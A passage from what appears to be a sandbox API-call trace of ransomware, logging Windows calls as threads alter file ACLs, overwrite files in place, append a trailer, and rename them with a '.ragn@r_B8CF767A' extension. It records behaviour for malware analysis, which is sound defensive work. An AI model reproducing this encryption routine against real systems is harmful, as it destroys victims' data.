nNumberOfBytesToWrite=0x141c6, lpNumberOfBytesWritten=0x5eff77c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff77c*=0x141c6, lpOverlapped=0x0) returned 1 [0175.681] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x141c6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.681] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.682] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x141c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.682] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.682] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5eff7bc*=0x100, lpOverlapped=0x0) returned 1 [0175.682] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5eff7bc*=0x100, lpOverlapped=0x0) returned 1 [0175.683] WriteFile (in: hFile=0x3bc, lpBuffer=0x5eff7c0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5eff7c0*, lpNumberOfBytesWritten=0x5eff7bc*=0xf, lpOverlapped=0x0) returned 1 [0175.683] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.683] GetProcessHeap () returned 0x3520000 [0175.683] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.683] CloseHandle (hObject=0x3bc) returned 1 [0175.689] lstrcpyW (in: lpString1=0x5eff32c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" [0175.689] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.ragn@r_B8CF767A" [0175.689] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 223 os_tid = 0x13c0 [0175.776] GetNamedSecurityInfoW () returned 0x0 [0175.776] SetEntriesInAclW () returned 0x0 [0175.776] SetNamedSecurityInfoW () returned 0x0 [0175.778] LocalFree (hMem=0x358ee18) returned 0x0 [0175.778] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.778] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 0x20 [0175.778] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.778] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affdc0 | out: lpFileSize=0x5affdc0*=3683) returned 1 [0175.778] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xe54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.778] GetProcessHeap () returned 0x3520000 [0175.778] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.778] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affd78, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5affd78*=0xf, lpOverlapped=0x0) returned 1 [0175.780] VirtualAlloc (lpAddress=0x0, dwSize=0xe63, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.780] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.780] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affd94 | out: lpNewFilePointer=0x0) returned 1 [0175.780] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xe63, lpNumberOfBytesRead=0x5affd68, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affd68*=0xe63, lpOverlapped=0x0) returned 1 [0175.780] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affd6c | out: lpNewFilePointer=0x0) returned 1 [0175.780] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe63, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.780] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xe63, lpNumberOfBytesWritten=0x5affd64, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affd64*=0xe63, lpOverlapped=0x0) returned 1 [0175.780] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe63, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.780] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.781] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xe63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.781] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.781] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affda4, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affda4*=0x100, lpOverlapped=0x0) returned 1 [0175.781] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affda4, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affda4*=0x100, lpOverlapped=0x0) returned 1 [0175.781] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affda8*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affda4, lpOverlapped=0x0 | out: lpBuffer=0x5affda8*, lpNumberOfBytesWritten=0x5affda4*=0xf, lpOverlapped=0x0) returned 1 [0175.781] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.781] GetProcessHeap () returned 0x3520000 [0175.781] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.781] CloseHandle (hObject=0x3bc) returned 1 [0175.782] lstrcpyW (in: lpString1=0x5aff914, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" [0175.782] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.ragn@r_B8CF767A" [0175.782] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 224 os_tid = 0x13b8 [0175.845] GetNamedSecurityInfoW () returned 0x0 [0175.845] SetEntriesInAclW () returned 0x0 [0175.845] SetNamedSecurityInfoW () returned 0x0 [0175.846] LocalFree (hMem=0x358ee18) returned 0x0 [0175.846] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.846] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.846] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 0x20 [0175.846] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.847] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5eff940 | out: lpFileSize=0x5eff940*=80738) returned 1 [0175.847] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13b53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.847] GetProcessHeap () returned 0x3520000 [0175.847] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.847] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff8f8, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5eff8f8*=0xf, lpOverlapped=0x0) returned 1 [0175.848] VirtualAlloc (lpAddress=0x0, dwSize=0x13b62, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.849] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.849] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff914 | out: lpNewFilePointer=0x0) returned 1 [0175.849] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x13b62, lpNumberOfBytesRead=0x5eff8e8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff8e8*=0x13b62, lpOverlapped=0x0) returned 1 [0175.852] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff8ec | out: lpNewFilePointer=0x0) returned 1 [0175.852] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13b62, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.852] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x13b62, lpNumberOfBytesWritten=0x5eff8e4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff8e4*=0x13b62, lpOverlapped=0x0) returned 1 [0175.853] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13b62, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.853] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.853] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.853] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.853] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff924, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5eff924*=0x100, lpOverlapped=0x0) returned 1 [0175.854] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff924, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5eff924*=0x100, lpOverlapped=0x0) returned 1 [0175.854] WriteFile (in: hFile=0x3bc, lpBuffer=0x5eff928*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff924, lpOverlapped=0x0 | out: lpBuffer=0x5eff928*, lpNumberOfBytesWritten=0x5eff924*=0xf, lpOverlapped=0x0) returned 1 [0175.854] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.854] GetProcessHeap () returned 0x3520000 [0175.854] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.854] CloseHandle (hObject=0x3bc) returned 1 [0175.857] lstrcpyW (in: lpString1=0x5eff494, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0175.857] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.ragn@r_B8CF767A" [0175.858] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 225 os_tid = 0x1350 [0176.123] GetNamedSecurityInfoW () returned 0x0 [0176.123] SetEntriesInAclW () returned 0x0 [0176.123] SetNamedSecurityInfoW () returned 0x0 [0176.124] LocalFree (hMem=0x5d28218) returned 0x0 [0176.124] LocalFree (hMem=0x5d2822c) returned 0x5d2822c [0176.124] LocalFree (hMem=0x358f2e0) returned 0x0 [0176.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 0x20 [0176.124] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0176.124] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affd34 | out: lpFileSize=0x5affd34*=54456) returned 1 [0176.124] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xd4a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.124] GetProcessHeap () returned 0x3520000 [0176.124] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d90 [0176.124] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d90, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affcec, lpOverlapped=0x0 | out: lpBuffer=0x3584d90*, lpNumberOfBytesRead=0x5affcec*=0xf, lpOverlapped=0x0) returned 1 [0176.126] VirtualAlloc (lpAddress=0x0, dwSize=0xd4b8, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.126] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.126] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affd08 | out: lpNewFilePointer=0x0) returned 1 [0176.126] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xd4b8, lpNumberOfBytesRead=0x5affcdc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affcdc*=0xd4b8, lpOverlapped=0x0) returned 1 [0176.128] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affce0 | out: lpNewFilePointer=0x0) returned 1 [0176.128] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd4b8, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.129] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xd4b8, lpNumberOfBytesWritten=0x5affcd8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affcd8*=0xd4b8, lpOverlapped=0x0) returned 1 [0176.129] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd4b8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.129] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.129] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xd4b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.129] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.130] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd18, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affd18*=0x100, lpOverlapped=0x0) returned 1 [0176.130] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affd18, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affd18*=0x100, lpOverlapped=0x0) returned 1 [0176.130] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affd1c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affd18, lpOverlapped=0x0 | out: lpBuffer=0x5affd1c*, lpNumberOfBytesWritten=0x5affd18*=0xf, lpOverlapped=0x0) returned 1 [0176.130] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.130] GetProcessHeap () returned 0x3520000 [0176.130] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d90 | out: hHeap=0x3520000) returned 1 [0176.130] CloseHandle (hObject=0x3bc) returned 1 [0176.132] lstrcpyW (in: lpString1=0x5aff888, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" [0176.132] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.ragn@r_B8CF767A" [0176.132] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 226 os_tid = 0x1348 [0176.134] GetNamedSecurityInfoW () returned 0x0 [0176.135] SetEntriesInAclW () returned 0x0 [0176.135] SetNamedSecurityInfoW () returned 0x0 [0176.138] LocalFree (hMem=0x5d28218) returned 0x0 [0176.138] LocalFree (hMem=0x5d2822c) returned 0x5d2822c [0176.138] LocalFree (hMem=0x358f2e0) returned 0x0 [0176.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 0x20 [0176.138] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0176.138] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5eff964 | out: lpFileSize=0x5eff964*=81482) returned 1 [0176.138] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13e3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.139] GetProcessHeap () returned 0x3520000 [0176.139] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d90 [0176.139] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d90, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff91c, lpOverlapped=0x0 | out: lpBuffer=0x3584d90*, lpNumberOfBytesRead=0x5eff91c*=0xf, lpOverlapped=0x0) returned 1 [0176.141] VirtualAlloc (lpAddress=0x0, dwSize=0x13e4a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0176.141] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.141] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff938 | out: lpNewFilePointer=0x0) returned 1 [0176.141] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x13e4a, lpNumberOfBytesRead=0x5eff90c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff90c*=0x13e4a, lpOverlapped=0x0) returned 1 [0176.145] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff910 | out: lpNewFilePointer=0x0) returned 1 [0176.145] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13e4a, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.145] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x13e4a, lpNumberOfBytesWritten=0x5eff908, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff908*=0x13e4a, lpOverlapped=0x0) returned 1 [0176.146] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13e4a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.146] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.147] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13e4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.147] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0176.147] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff948, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5eff948*=0x100, lpOverlapped=0x0) returned 1 [0176.147] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff948, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5eff948*=0x100, lpOverlapped=0x0) returned 1 [0176.147] WriteFile (in: hFile=0x3bc, lpBuffer=0x5eff94c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff948, lpOverlapped=0x0 | out: lpBuffer=0x5eff94c*, lpNumberOfBytesWritten=0x5eff948*=0xf, lpOverlapped=0x0) returned 1 [0176.148] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0176.148] GetProcessHeap () returned 0x3520000 [0176.148] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d90 | out: hHeap=0x3520000) returned 1 [0176.148] CloseHandle (hObject=0x3bc) returned 1 [0176.152] lstrcpyW (in: lpString1=0x5eff4b8, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0176.152] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.ragn@r_B8CF767A" [0176.152] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 227 os_tid = 0x1274 [0176.419] GetNamedSecurityInfoW () returned 0x0 [0176.420] SetEntriesInAclW () returned 0x0 [0176.420] SetNamedSecurityInfoW () returned 0x0 [0176.420] LocalFree (hMem=0x358ee28) returned 0x0 [0176.420] LocalFree (hMem=0x358ee3c) returned 0x358ee3c [0176.421] LocalFree (hMem=0x5d4ff20) returned 0x0 [0176.421] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf")) returned 0x20 [0176.421] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0176.421] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affb14 